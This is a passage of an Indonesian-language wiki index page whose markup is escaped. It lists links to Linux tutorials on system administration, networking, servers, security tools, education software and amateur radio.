* [[Beberapa Tips Menggunakan Shell di Linux]]&lt;br /&gt;
* [[Tip mempelajari command shell di Linux]]&lt;br /&gt;
* [[Perintah Dasar Linux]]&lt;br /&gt;
* http://cb.vu/unixtoolbox.xhtml - perintah dasar linux&lt;br /&gt;
* [[Cron]]&lt;br /&gt;
* [[Instalasi Printer di Linux]]&lt;br /&gt;
* [[Printer yang di dukung Linux]]&lt;br /&gt;
* [[Instalasi Microsoft TrueType Font di Ubuntu]]&lt;br /&gt;
* [[Anti Virus]]&lt;br /&gt;
* [[Membuat Autoexec.bat di Linux]]&lt;br /&gt;
* [[Shell Script: Untuk FTP]]&lt;br /&gt;
* [http://www.layangan.com/asfik/writings/chroot-login-sshd.html Chroot login di Linux dengan menggunakan sshd]&lt;br /&gt;
* [http://www.layangan.com/asfik/writings/chroot-login-sudo.html Chroot login di Linux dengan menggunakan sudo]&lt;br /&gt;
* [[sudo tanpa password di ubuntu]]&lt;br /&gt;
* http://techno-os.net/info-tutorials/linux/tools-monitoring-wajib-untuk-sysadmin-linux/&lt;br /&gt;
* [[Mencari aplikasi menggunakan aptitude search]]&lt;br /&gt;
* [[Lynx - Browser Web text]]&lt;br /&gt;
* [[diff - Membandingkan Isi File]]&lt;br /&gt;
* [[file - Mengetahui Tipe File]]&lt;br /&gt;
* [[X11 Forwarding di SSH]]&lt;br /&gt;
* [[acpi]] Mengetahui informasi baterai&lt;br /&gt;
* [[Melihat Paket Software Aplikasi yang terinstall di Ubuntu]]&lt;br /&gt;
* [[Linux Command line BitTorrent client]]&lt;br /&gt;
* [[Server: Instalasi GUI di Ubuntu Server]]&lt;br /&gt;
* http://www.tahutek.net/2011/02/ubuntu-trik-backup-semua-aplikasi-yang.html&lt;br /&gt;
&lt;br /&gt;
===File System===&lt;br /&gt;
* [[Instalasi NTFS]]&lt;br /&gt;
* [[Instalasi RAR]]&lt;br /&gt;
* [[Unrar multiple file]]&lt;br /&gt;
* [[Kompresi File 7z]]&lt;br /&gt;
* [[Mount dan Umount Flashdisk]]&lt;br /&gt;
* [[Format Flashdisk di Shell]]&lt;br /&gt;
* [[Format harddisk]]&lt;br /&gt;
* [[Label harddisk]]&lt;br /&gt;
* [[Mount File iso Membuat Virtual CD]]&lt;br /&gt;
* [[Membuat File iso dari CD atau DVD]]&lt;br /&gt;
* [[Menjalankan program DOS menggunakan DOSEMU]]&lt;br /&gt;
* [[Instalasi Software RAID]]&lt;br /&gt;
* [http://www.doscom.org/2009/05/mounting-otomatis-partisi-ntfs.html Mount Automatis Partisi NTFS]&lt;br /&gt;
* [[remastersys]] - untuk backup Debian &amp;amp; Ubuntu, seperti Ghost.&lt;br /&gt;
* [[iSCSI]]&lt;br /&gt;
* [[Cara Sederhana Untuk Memproteksi USB Harddisk di Ubuntu]]&lt;br /&gt;
* [[Teknik Mengenkripsi Harddisk]]&lt;br /&gt;
* http://www.tahutek.net/2010/08/ubuntu-ofris-aplikasi-mirip-deep-freeze.html#more - DeepFreeze versi Linux&lt;br /&gt;
* http://replayfrom.wordpress.com/2010/08/15/burg-grub-boot-loader/&lt;br /&gt;
* http://ubuntuforums.org/showthread.php?t=1369019 - Password untuk Grub&lt;br /&gt;
* [[Ofris - buat deep freeze di Ubuntu]]&lt;br /&gt;
* [[Cek ceksum download-an]]&lt;br /&gt;
&lt;br /&gt;
===Pendidikan===&lt;br /&gt;
* [[Instalasi Edubuntu]]&lt;br /&gt;
* [[Instalasi Aplikasi Belajar Sains / Ilmu Pengetahuan]]&lt;br /&gt;
* [[Belajar sambil bermain dengan Komputer | Linux untuk TK dan SD]]&lt;br /&gt;
* [[Linux untuk Pendidikan]]&lt;br /&gt;
* [[Aplikasi Kamus Inggris Indonesia]]&lt;br /&gt;
* [[Instalasi Edubuntu CD Aplikasi]]&lt;br /&gt;
* [[Software Untuk Pemancar FM Broadcast Komunitas]]&lt;br /&gt;
** [[Instalasi Campcaster]] [[Software]] untuk Control [[Pemancar Broadcast FM Komunitas]]&lt;br /&gt;
* [[Octave open source-nya Mathlab]]&lt;br /&gt;
* [[Scilab open source-nya Mathlab]]&lt;br /&gt;
* [[SAGE open source-nya Mathlab]]&lt;br /&gt;
* [[MAXIMA Symbolic Matematika di Linux]]&lt;br /&gt;
* [[Jaringan Informasi Bersama Antar Sekolah - JIBAS]]&lt;br /&gt;
* [[Calibre - format converter untuk ebook]]&lt;br /&gt;
* [[iTALC - melihat &amp;amp; kontrol komputer murid melalui jaringan]]&lt;br /&gt;
* [[Lab Bahasa]]&lt;br /&gt;
* [[R-CRAN: alternatif pengolah statistik pengganti SPSS]]&lt;br /&gt;
&lt;br /&gt;
===[[Multimedia di Linux]]===&lt;br /&gt;
&lt;br /&gt;
===[[Game di Linux]]===&lt;br /&gt;
&lt;br /&gt;
===[[GoogleMap]]===&lt;br /&gt;
===[[Elektronika di Linux]]===&lt;br /&gt;
&lt;br /&gt;
===Tampilan Linux===&lt;br /&gt;
* http://gnome-look.org/&lt;br /&gt;
* [[Linux XP]]&lt;br /&gt;
* [[Nouvelix Linux]]&lt;br /&gt;
* [[Cara Install Theme di Ubuntu]]&lt;br /&gt;
* [[Membuat gambar Splash Image Grub2 Ubuntu 9.10]]&lt;br /&gt;
&lt;br /&gt;
===Office===&lt;br /&gt;
* [http://surabaya.linux.or.id/archives/2007/08/11/opendocument-format-bareng2-pake-format-dokumen-masa-depan.html OpenDocument Format - Format Dokumen Masa Depan]&lt;br /&gt;
* [http://agusw.penamedia.com/2009/09/13/quran-in-openoffice-qioo/ Instalasi Al Qur&#039;an di OpenOffice]&lt;br /&gt;
* [[Office: Konversi PDF ke Office]]&lt;br /&gt;
* [[Aplikasi untuk Penerbitan Buku]]&lt;br /&gt;
* http://tanyarezaervani.wordpress.com/2011/04/03/tanya-45-kamus-bahasa-inggris-offline-di-ubuntu-anda/&lt;br /&gt;
&lt;br /&gt;
===[[Project Management]]===&lt;br /&gt;
&lt;br /&gt;
* [[Instalasi planner]]&lt;br /&gt;
* [[Instalasi opensched]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Windows di Linux===&lt;br /&gt;
&lt;br /&gt;
* [[wine]]&lt;br /&gt;
* [[Instal wine]]&lt;br /&gt;
* [[Instal playonlinux]] - untuk menjalankan game di [[Linux]] :)&lt;br /&gt;
* http://melengo.wordpress.com/2011/02/27/install-aplikasi-windos-di-linux-mengunakan-crossover-8-0/&lt;br /&gt;
&lt;br /&gt;
===Lain-lain===&lt;br /&gt;
* [[ACPI]]&lt;br /&gt;
* [[alsamixer]]&lt;br /&gt;
* [[Computer Aided Design - CAD]]&lt;br /&gt;
* [[OpenOffice Base]] seperti Microsoft Access&lt;br /&gt;
* [[Update Pidgin agar dapat login ke Yahoo.com]]&lt;br /&gt;
&lt;br /&gt;
* [[Instalasi bonnie++]] - untuk benchmarking&lt;br /&gt;
* [[Instalasi Firefox]]&lt;br /&gt;
* [[Instalasi Skype]]&lt;br /&gt;
* [[Instalasi Zekr]] Al Qur&#039;an di [[Linux]]&lt;br /&gt;
* [[Menyambung ke HotSpot]] via text mode&lt;br /&gt;
* [[VirtualBox Virtual Machine di Linux]]&lt;br /&gt;
* [[QEMU generic machine emulator di Linux]]&lt;br /&gt;
* [[Mengambil gmail menggunakan fetchmail]]&lt;br /&gt;
* [[Mengembalikan Icon Network di Ubuntu yang hilang]]&lt;br /&gt;
* [[Instalasi Google Chrome]]&lt;br /&gt;
* [[Membuat Script Sederhana di Linux]]&lt;br /&gt;
* http://pujanggaitusudahmati.wordpress.com/2010/03/10/instalasi-ubuntu-studio-theme-pada-ubuntu-karmic/ - Theme Ubuntu&lt;br /&gt;
* [[Download Manager di Linux]]&lt;br /&gt;
* [[Mirroring Website Dengan httrack]]&lt;br /&gt;
* [[Serial Terminal di Linux]]&lt;br /&gt;
&lt;br /&gt;
===RSS Feed===&lt;br /&gt;
* [[nrss]] ncurse RSS&lt;br /&gt;
* [[Instalasi gwibber]]&lt;br /&gt;
* [[Instalasi blam]]&lt;br /&gt;
&lt;br /&gt;
===Referensi===&lt;br /&gt;
&lt;br /&gt;
* http://ubuntu-tweak.com/&lt;br /&gt;
&lt;br /&gt;
==Pemrograman==&lt;br /&gt;
&lt;br /&gt;
* [[Belajar C++]]&lt;br /&gt;
* [[Compile Kernel]]&lt;br /&gt;
* [[Compile Kernel Alternatif]]&lt;br /&gt;
* [[Instalasi Ruby]]&lt;br /&gt;
* http://sourceforge.net/projects/baik/ - bahasa pemrograman buatan Indonesia dengan sintaks Indonesia.&lt;br /&gt;
* [[Gambas]] &amp;quot;Visual Basic&amp;quot;-nya [[Linux]]&lt;br /&gt;
* [http://www.jeni.or.id/web/guest/utama Java Education Network Indonesia]&lt;br /&gt;
* [[Pemrograman Java]]&lt;br /&gt;
* http://www.dijexi.com - Situs Tips Pemrogramman&lt;br /&gt;
* [[PIC Programming]]&lt;br /&gt;
* [[Kumpulan Aplikasi Pencari Vulnerabilities di Source Code]]&lt;br /&gt;
&lt;br /&gt;
==Network==&lt;br /&gt;
&lt;br /&gt;
===Overview===&lt;br /&gt;
* [[Networking Fundamental]]&lt;br /&gt;
* [http://www.layangan.com/asfik/writings/dns-bind.html Konsep DNS dan tutorial instalasi BIND] ([http://www.layangan.com/asfik/writings/dns-bind.pdf pdf])&lt;br /&gt;
* [[Konsep Proxy]]&lt;br /&gt;
* [[Konsep IPSec]]&lt;br /&gt;
* [[Teknologi RT/RW-net]]&lt;br /&gt;
* [[ISO untuk Linux / Open Source Box Router]]&lt;br /&gt;
* [[Mail Server]]&lt;br /&gt;
* [[Router Appliance]]&lt;br /&gt;
* [[Mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global]]&lt;br /&gt;
* [http://blog.dapurhosting.com/category/tutorial-cpanel Tutorial cPanel]&lt;br /&gt;
&lt;br /&gt;
===[[Sistem Operasi Router Ready]]===&lt;br /&gt;
&lt;br /&gt;
===Konfigurasi Dasar===&lt;br /&gt;
* [[Konfigurasi Jaringan]]&lt;br /&gt;
* [[Setup IP Address Statik]]&lt;br /&gt;
* [[Instalasi Gnome-PPP]]&lt;br /&gt;
* [[Simulasi Router di Ubuntu dengan Firestarter (run on virtualBox)]]&lt;br /&gt;
* [[Disable IPv6 di Ubuntu]]&lt;br /&gt;
* [[Konfigurasi Wireless Interface ke Access Point Dengan Enkripsi WPA]]&lt;br /&gt;
&lt;br /&gt;
===Proxy===&lt;br /&gt;
* [[Instalasi Squid]] Proxy Server&lt;br /&gt;
* [[Instalasi DansGuardian]] dan [[Firewall Untuk Proxy DansGuardian]]&lt;br /&gt;
* [[Script NAT Proxy]]&lt;br /&gt;
* [[Instalasi Memcache Server]]&lt;br /&gt;
* [[Meredirect Port &amp;amp; Transparant Proxy]]&lt;br /&gt;
* [http://lqman.wordpress.com/2007/11/09/konfigurasi-sederhana-squid-proxy-server/ Konfigurasi Sederhana Squid Proxy Server]&lt;br /&gt;
* [http://lqman.wordpress.com/2008/06/25/squid-transparent-proxy/ Squid Transparent Proxy]&lt;br /&gt;
* [http://lqman.wordpress.com/2008/05/08/pengaturan-beban-squid-menggunakan-beberapa-parent/ Pengaturan Beban Squid Mengunakan Beberapa Parent]&lt;br /&gt;
* [[Instalasi Tinyproxy]]&lt;br /&gt;
* http://wiki.squid-cache.org/Features/Authentication?action=show&amp;amp;redirect=SquidFaq%2FProxyAuthentication - Authentikasi di Squid&lt;br /&gt;
* [[Instalasi Proxy Server di Belakang Modem]]&lt;br /&gt;
&lt;br /&gt;
===Monitoring dan Statistik===&lt;br /&gt;
* [[Software untuk Monitoring Jaringan]]&lt;br /&gt;
* [[Instalasi AWStats]] Analisa [[Web]] Log Statistik&lt;br /&gt;
* [[Instalasi MRTG]]&lt;br /&gt;
* [[Instalasi NTOP]]&lt;br /&gt;
* [[Instalasi Smokeping]] - Monitoring Latensi / Delay di Network&lt;br /&gt;
* [[Membuat sendiri Aplikasi SpeedTest sejenis dengan www.speedtest.net]]&lt;br /&gt;
* [[Instalasi NAGIOS]] [[Network Management System]]&lt;br /&gt;
* [[Instalasi OSMIUS]] [[Network Management System]]&lt;br /&gt;
* [http://techno-os.net/info-tutorials/linux/tools-monitoring-wajib-untuk-sysadmin-linux/ Tools Monitoring wajib untuk SysAdmin Linux]&lt;br /&gt;
* [[Billing WARNET]]&lt;br /&gt;
* [[20 Linux System Monitoring Tool]]&lt;br /&gt;
&lt;br /&gt;
===DNS===&lt;br /&gt;
* [[Instalasi BIND]] [[DNS Server]]&lt;br /&gt;
* [[Instalasi DynDNS]]&lt;br /&gt;
* [[Tempat Registrasi Domain]]&lt;br /&gt;
* [[Monitoring Traffic DNS]]&lt;br /&gt;
&lt;br /&gt;
===Koneksi Jaringan===&lt;br /&gt;
* [[Penggunaan Vodafone Mobile Connect Card Driver For Linux]]&lt;br /&gt;
* [[Instalasi USB mode switch untuk USB Modem yang ada Storage]]&lt;br /&gt;
* [[Instalasi WvDial]]&lt;br /&gt;
* [[Dial menggunakan WvDial]]&lt;br /&gt;
* [[Dial menggunakan Modem]]&lt;br /&gt;
* [[Load Balancing di Linux]]&lt;br /&gt;
* [[Linux VLAN]] [[Virtual Local Area Network]]&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/24/setup-dun-di-ubuntu-treo-680/&lt;br /&gt;
* [[Konfigurasi Broadcom WiFi di Ubuntu]]&lt;br /&gt;
* [[Mempercepat Koneksi Internet di Ubuntu dan Turunannya]]&lt;br /&gt;
* [[Konfigurasi Wireless Interface ke Access Point Dengan Enkripsi WPA]]&lt;br /&gt;
&lt;br /&gt;
===Bandwidth Manajemen===&lt;br /&gt;
* [[Bandwidth Manajemen Menggunakan HTB]]&lt;br /&gt;
* [[Bandwidth Manajemen Menggunakan MasterShaper]]&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/29/catchcachehit/&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/29/linuxtc1/&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/30/linuxtc2/&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/30/linuxtc3/&lt;br /&gt;
* http://lartc.org/wondershaper/&lt;br /&gt;
* http://medwinz.blogsome.com/2008/11/18/traffic-shaping-lagi-huh/&lt;br /&gt;
* [[Bandwidth Management: iptables untuk mengatasi IDM]]&lt;br /&gt;
* [[WebHTB]]&lt;br /&gt;
* [[Check Penggunaan Bandwidth]]&lt;br /&gt;
&lt;br /&gt;
===File Server===&lt;br /&gt;
* [[Sharing Printer di Ubuntu]]&lt;br /&gt;
* [[Instalasi dan Konfigurasi NFS]] File Sharing.&lt;br /&gt;
* [[Instalasi dan Konfigurasi SMB]] Windows File Sharing.&lt;br /&gt;
* [http://www.vavai.com/index.php?/archives/46-Samba-Server-sebagai-Primary-Domain-Controller-PDC-Active-Directory-I.html Samba Server sebagai Primary Domain Controller PDC ACtive Directory]&lt;br /&gt;
*[http://vavai.com/v2/2009/06/tutorial-file-server-pengganti-windows-server/ Tutorial File Server Pengganti Windows Server]&lt;br /&gt;
* [[Akses SMB / File Server / Windows File Server menggunakan Ubuntu]]&lt;br /&gt;
* http://howtoforge.com/running-a-file-and-print-server-with-ebox-on-ubuntu8.04-server&lt;br /&gt;
* http://howtoforge.com/running-a-file-and-print-server-with-ebox-on-ubuntu8.04-server-p2&lt;br /&gt;
* http://howtoforge.com/running-a-file-and-print-server-with-ebox-on-ubuntu8.04-server-p3&lt;br /&gt;
&lt;br /&gt;
===Server Jaringan===&lt;br /&gt;
* [[VoIP]] [[Internet Telepon]]&lt;br /&gt;
* [[Instalasi Webmin]] Konfigurasi Server via [[Web]]&lt;br /&gt;
* [[Instalasi DHCP Server]]&lt;br /&gt;
* [[Instalasi FreeRadius]]&lt;br /&gt;
* [[Instalasi FTP Server]]&lt;br /&gt;
* [[Instalasi ProFTP Server]]&lt;br /&gt;
* [[Instalasi SSHD]] [[SSH Server]]&lt;br /&gt;
* [[Instalasi NTP]] [[time server]]&lt;br /&gt;
* [[Instalasi IPCOP]]&lt;br /&gt;
* http://easyhotspot.sourceforge.net - EasyHotSpot Manajemen&lt;br /&gt;
* [[Instalasi Samba]] Windows File Sharing&lt;br /&gt;
* [[Linux Terminal Server Project]]&lt;br /&gt;
&lt;br /&gt;
===[[Linux Terminal Server Project]] ([[LTSP]])===&lt;br /&gt;
&lt;br /&gt;
* [[DRBL (Diskless Remote Boot in Linux)]]&lt;br /&gt;
* [[Clonezilla]]&lt;br /&gt;
&lt;br /&gt;
===Web Server===&lt;br /&gt;
* [[Instalasi Apache]] [[Web Server]]&lt;br /&gt;
* [[Instalasi Lighttpd]] [[Web Server]]&lt;br /&gt;
* [[Instalasi XAMPP]] [[Web Server]]&lt;br /&gt;
* [[Mengaktifkan https di Apache]]&lt;br /&gt;
* [[Apache2: Mengaktifkan Modul Apache]]&lt;br /&gt;
* [[Apache2: Mengaktifkan public_html untuk user]]&lt;br /&gt;
* [[Konfigurasi Sederhana Virtual Host di Apache]]&lt;br /&gt;
* [[PHP PEAR]]&lt;br /&gt;
* [[Web Server Object Caching]]&lt;br /&gt;
* [[nginx]]&lt;br /&gt;
* [[Awstats]]&lt;br /&gt;
* [[Calamaris]]&lt;br /&gt;
&lt;br /&gt;
===Mail Server===&lt;br /&gt;
* [[Instalasi Postfix]] [[SMTP Mail Server]]&lt;br /&gt;
* [https://help.ubuntu.com/community/PostfixCompleteVirtualMailSystemHowto Postfix Complete Virtual Mail System Howto]&lt;br /&gt;
* [[Instalasi POP3 Server]]&lt;br /&gt;
* [[Instalasi IMAP Server]]&lt;br /&gt;
* [[Instalasi Dovecot]] POP3/IMAP Server&lt;br /&gt;
* [[instalasi Squirrelmail]] Webmail Server&lt;br /&gt;
* [[Instalasi Mailman]] mailing list server&lt;br /&gt;
* [[Instalasi Mailman di Ubuntu]]&lt;br /&gt;
* [http://www.layangan.com/asfik/writings/qmail-vmailmgr.html Instalasi Qmail, Vmailmgr, Omail Admin, Courier Imap, dan Squirrelmail]&lt;br /&gt;
* [[Procmail]]&lt;br /&gt;
* [[Zimbra]]&lt;br /&gt;
&lt;br /&gt;
===Database Server===&lt;br /&gt;
* [[Instalasi MySQL]] [[database server]]&lt;br /&gt;
* [[Instalasi Oracle]] [[database server]]&lt;br /&gt;
* [[Instalasi Berkeley DB]]&lt;br /&gt;
* [[Instalasi PostgresQL]] [[database server]]&lt;br /&gt;
* [[Instalasi FreeRADIUS]]&lt;br /&gt;
* [[Menggunakan UnixODBC]]&lt;br /&gt;
* [[Perintah MySQL]]&lt;br /&gt;
* http://www.linuxquestions.org/questions/linux-server-73/how-to-enable-mssql-on-linux-589956/&lt;br /&gt;
&lt;br /&gt;
===Chatting Server===&lt;br /&gt;
* [[Instalasi eJabberd]] [[Instant Messaging]] / [[Internet Messaging]]&lt;br /&gt;
* [[Instalasi Jabber]] [[Instant Messaging]] / [[Internet Messaging]]&lt;br /&gt;
* [[Instalasi Jabberd2]] [[Instant Messaging]] / [[Internet Messaging]]&lt;br /&gt;
&lt;br /&gt;
===Forum Server===&lt;br /&gt;
* [[Instalasi PunBB]] Forum&lt;br /&gt;
* [[Instalasi Vanilla Forum]]&lt;br /&gt;
* [[MyBB]]&lt;br /&gt;
&lt;br /&gt;
===Server Perpustakaan &amp;amp; Knowledge Management===&lt;br /&gt;
* [[Instalasi Senayan]] Digital Library&lt;br /&gt;
* [[Instalasi KnowledgeTree]] Digital Library&lt;br /&gt;
* [[Instalasi KnowledgeTree Versi 3.7]]&lt;br /&gt;
* [[Epiware]]&lt;br /&gt;
* [[Greenstone]]&lt;br /&gt;
* [[OpenKM]]&lt;br /&gt;
* [[Owl]]&lt;br /&gt;
&lt;br /&gt;
===Server Sistem Informasi Sekolah &amp;amp; Kampus===&lt;br /&gt;
* [[cmsbalitbang]] Web Sekolah dari BALITBANG DIKNAS&lt;br /&gt;
* [[Instalasi Sisfokampus]]&lt;br /&gt;
* [[Instalasi Sisfokol SD]]&lt;br /&gt;
* [[Instalasi Sisfokol SMP]]&lt;br /&gt;
* [[Instalasi Sisfokol SMA]]&lt;br /&gt;
* [[Instalasi Sisfokol SMK]]&lt;br /&gt;
* [[Instalasi Sisfokol Janisari]]&lt;br /&gt;
* [[SISFOKOL SLTA]]&lt;br /&gt;
* [[Konfigurasi php.ini agar SISFOKOL berjalan sempurna]]&lt;br /&gt;
* [[Instalasi MediaWiki]] Wiki Server (seperti [http://opensource.telkomspeedy.com/wiki SpeedyWiki])&lt;br /&gt;
* [[Cara Instalasi SUPERPEDIA | Instalasi Superpedia]]&lt;br /&gt;
* [[Instalasi Data Wikipedia dari Kambing]]&lt;br /&gt;
* [[Instalasi Moodle]] e-learning Server&lt;br /&gt;
&lt;br /&gt;
===Social Networking===&lt;br /&gt;
&lt;br /&gt;
* [[Instalasi Mahara]] Social Networking&lt;br /&gt;
* [[Instalasi OpenPNE]] Social Networking&lt;br /&gt;
* [[jcow]]&lt;br /&gt;
&lt;br /&gt;
===Server Aplikasi===&lt;br /&gt;
&lt;br /&gt;
* [[Apache Lucene Solr: open source enterprise search platform]]&lt;br /&gt;
* [[Content Manajemen System CMS untuk Dunia Pendidikan]]&lt;br /&gt;
* [[e-Auction Server]]&lt;br /&gt;
* [http://webtecker.com/2008/04/22/8-best-open-source-shopping-cart-solutions/ Best Open Source Shopping Cart Solutions]&lt;br /&gt;
* [[SMS Server]]&lt;br /&gt;
* [[Source Forge Collaboration Server]]&lt;br /&gt;
* [[CARE2X Sistem Informasi Rumah Sakit]]&lt;br /&gt;
* [[Instalasi Asterisk]] VoIP Softswitch&lt;br /&gt;
* [[Instalasi eGroupWare]]&lt;br /&gt;
* [[Instalasi Elgg]] Social Networking&lt;br /&gt;
* [[Jcow]] Social Networking&lt;br /&gt;
* [[Instalasi Hadist Web]]&lt;br /&gt;
* [[Instalasi Joomla]] [[CMS]]&lt;br /&gt;
** [http://surabaya.linux.or.id/archives/2008/03/11/merecovery-password-administrator-joomla.html Merecovery Password Administrator Joomla]&lt;br /&gt;
** [[Instalasi VirtueMart di Joomla]]&lt;br /&gt;
* [[Instalasi PHPMotion]] Youtube Clone&lt;br /&gt;
* [[Instalasi PrestaShop]] e-commerce server&lt;br /&gt;
* [[Instalasi SQL Ledger]] Server untuk [[Accounting]]&lt;br /&gt;
* [[Instalasi Ushahidi]]&lt;br /&gt;
* [[Instalasi WebERP]]&lt;br /&gt;
* [[Instalasi Wordpress]] Blog Server&lt;br /&gt;
* [[Instalasi Wordpress Multi User]] Blog Server&lt;br /&gt;
* [[Instalasi WaypointHR]] Server [[HRD]]&lt;br /&gt;
* [[Membuat Game Server di linux]]&lt;br /&gt;
* [[Software Gratis untuk mendirikan Toko On-Line melalui internet berbasis AJAX Web 2.0]]&lt;br /&gt;
* [[Membuat Server Video Streaming Berbasis Web]]&lt;br /&gt;
* [http://tunggul.staff.uns.ac.id/2008/09/03/bikin-rapidshare-dengan-droopy/ Bikin RapidShare dengan Droopy]&lt;br /&gt;
* [[Instalasi Sahana]]&lt;br /&gt;
* [[Moodle]]&lt;br /&gt;
* http://www.howtoforge.com/build-your-own-video-community-with-lighttpd-and-flowplayer-ubuntu-9.10 - Streaming Video&lt;br /&gt;
* http://www.cyberciti.biz/tips/open-source-project-management-software.html - [[web]] based project management&lt;br /&gt;
* [[xTuple]]&lt;br /&gt;
&lt;br /&gt;
===[[Cloud Computing]]===&lt;br /&gt;
&lt;br /&gt;
* [[Eucalyptus]]&lt;br /&gt;
* [[Amazon Web Services]]&lt;br /&gt;
* [[Elastic Fox]]&lt;br /&gt;
* [[Euca2ools]]&lt;br /&gt;
&lt;br /&gt;
==[[Security &amp;amp; Network Security]]==&lt;br /&gt;
&lt;br /&gt;
* [[Beberapa Tip Hacking]]&lt;br /&gt;
* [[Meneropong Situs e-banking]]&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/23/membuat-linux-kebal-arp-poisoning-arp-spoofing/&lt;br /&gt;
* http://www.go2linux.org/fedora-centos-root-password-recovery - kalau lupa [[password]] root&lt;br /&gt;
* [[Instalasi PacketTracer Cisco di Ubuntu]]&lt;br /&gt;
* [[Melihat Header e-mail]]&lt;br /&gt;
* [[Menggunakan whois]]&lt;br /&gt;
* http://hendrasiahaan.wordpress.com/2010/03/24/11-kelemahan-yang-kerap-tidak-disadari-admin-jaringan/&lt;br /&gt;
* [[Enkripsi Disk]]&lt;br /&gt;
* http://www.madboa.com/geek/gpg-quickstart/#keyintro - GPG Key&lt;br /&gt;
* [[tuxcut]]&lt;br /&gt;
* http://www.howtoforge.com/video_surveillance_zoneminder_ubuntu -Video Surveillace di Ubuntu&lt;br /&gt;
* [[Linux Malware Detect]]&lt;br /&gt;
&lt;br /&gt;
===Firewall &amp;amp; Blokir Situs===&lt;br /&gt;
* [[Mini Howto iptables untuk Firewall]]&lt;br /&gt;
* [[Block Website Dengan Firestarter]]&lt;br /&gt;
* [http://aceh.linux.or.id/archives/393 Firestarter [[Firewall]] untuk [[Ubuntu]]]&lt;br /&gt;
* [[Teknik Memblok Situs Tidak Baik]]&lt;br /&gt;
* [[Firewall Untuk Proxy DansGuardian]]&lt;br /&gt;
* [[Edit Konfigurasi Pemblokiran Dansguardian]]&lt;br /&gt;
* [[Instalasi phpSHIELD]]&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/23/membuat-linux-kebal-arp-poisoning-arp-spoofing/&lt;br /&gt;
* http://techno-os.net/info-tutorials/hacking/pemutus-jaringan-lan-di-linux-dengan-technocut/&lt;br /&gt;
* http://awarmanf.wordpress.com/2010/05/01/drop-ultrasurf-dengan-iptables/&lt;br /&gt;
&lt;br /&gt;
===Network Monitoring &amp;amp; Intrution Detection===&lt;br /&gt;
* [[Instalasi Nessus]]&lt;br /&gt;
* [[Instalasi NTOP]]&lt;br /&gt;
* [[Instalasi SNORT dan BASE]] [[Intrusion Detection System]] ([[IDS]])&lt;br /&gt;
* [[Instalasi EasyIDS]]&lt;br /&gt;
* [[Suricata Open Source Next Generation Intrusion Detection and Prevention Engine]]&lt;br /&gt;
* http://www.endace.com/cyber-security-monitoring.html&lt;br /&gt;
* [[Instalasi MailScanner]]&lt;br /&gt;
* http://www.scamnailer.info/&lt;br /&gt;
* [[Teknik Anti Spam]]&lt;br /&gt;
&lt;br /&gt;
===Secure Connection===&lt;br /&gt;
* [[Virtual Private Network]] ([[VPN]])&lt;br /&gt;
* [[Instalasi dan Konfigurasi rsync]] untuk backup antar mesin&lt;br /&gt;
* [[Persiapan SSH untuk SCP Batch]]&lt;br /&gt;
* [[Topal - Pengikat GnuPG dan Alpine]]&lt;br /&gt;
* [[Mengikat GnuPG dan Alpine]]&lt;br /&gt;
* [[Menggunakan GnuPG]]&lt;br /&gt;
* [[GnuPG Mini Howto]]&lt;br /&gt;
* [[GnuPG Privacy Handbook]]&lt;br /&gt;
* [[Ubah Nomor Port sshd]]&lt;br /&gt;
* [[Login SSH Otomatis Tanpa Password]]&lt;br /&gt;
&lt;br /&gt;
===Anti Virus===&lt;br /&gt;
* [[Instalasi antivirus clamav]]&lt;br /&gt;
&lt;br /&gt;
===Mematikan Mesin Windows Jarak Jauh===&lt;br /&gt;
&lt;br /&gt;
* http://www.howtoforge.com/how-to-remotely-shut-down-windows-xp-computers-from-a-linux-server&lt;br /&gt;
* http://www.lgr.ca/blog/2008/04/shutdown-windows-from-linux.html&lt;br /&gt;
* http://www.linuxforums.org/forum/redhat-fedora-linux-help/60324-remote-shutdown-windows-linux-box.html&lt;br /&gt;
* http://landofthefreeish.com/linux/howto-remote-shutdown-of-a-windows-computer-from-linux/&lt;br /&gt;
* http://blog.beausanders.com/?q=node/8&lt;br /&gt;
&lt;br /&gt;
==Selular==&lt;br /&gt;
* [[Instalasi Wammu]] - mobile phone manager di [[linux]]&lt;br /&gt;
* [[Mengoperasikan Wammu]] - mobile phone manager di [[linux]]&lt;br /&gt;
* [[instalasi Gnokii]] - mobile phone manager di [[linux]]&lt;br /&gt;
* [[Mengoperasikan Gnokii]] - mobile phone manager di [[linux]]&lt;br /&gt;
&lt;br /&gt;
==[[Amatir Radio]] di [[Linux]]==&lt;br /&gt;
&lt;br /&gt;
* [[Membangun Gateway Packet Radio di Linux]]&lt;br /&gt;
* [[Membangun F6FBB BBS di Linux]]&lt;br /&gt;
* [[Instalasi Fldigi]] dan [[Compile Fldigi]] naga-naganya lebih baik di compile&lt;br /&gt;
* [[Instalasi PSKmail]] [[Gateway]] [[e-mail]] &amp;amp; telnet antara [[HF]] / [[VHF]] ke [[Internet]] untuk [[EMCOM]]&lt;br /&gt;
* [[Instalasi XASTIR untuk APRS di Linux]]&lt;br /&gt;
* [[Echolinux: Echolink di Linux]]&lt;br /&gt;
&lt;br /&gt;
===[[Elektronika di Linux]]===&lt;br /&gt;
===[[Amatir Radio di Linux]]===&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
&lt;br /&gt;
* http://www.revolution-os.com/&lt;br /&gt;
* http://pemulalinux.com/&lt;br /&gt;
* http://wiki.warneter.net/&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
&lt;br /&gt;
* [[Tip Membangun Server Sendiri]]&lt;br /&gt;
&lt;br /&gt;
Ada baiknya mendownload &amp;amp; menbaca-baca file yang ada di URL berikut. File tersebut kebanyakan di ambil dari situs [http://www.tldp.org The Linux Documentation Project].&lt;br /&gt;
&lt;br /&gt;
* Kumpulan dokumentasi bagi pemula Linux - http://opensource.telkompspeedy.com/speedyorari/index.php?dir=library/library-sw-hw/linux-intro&lt;br /&gt;
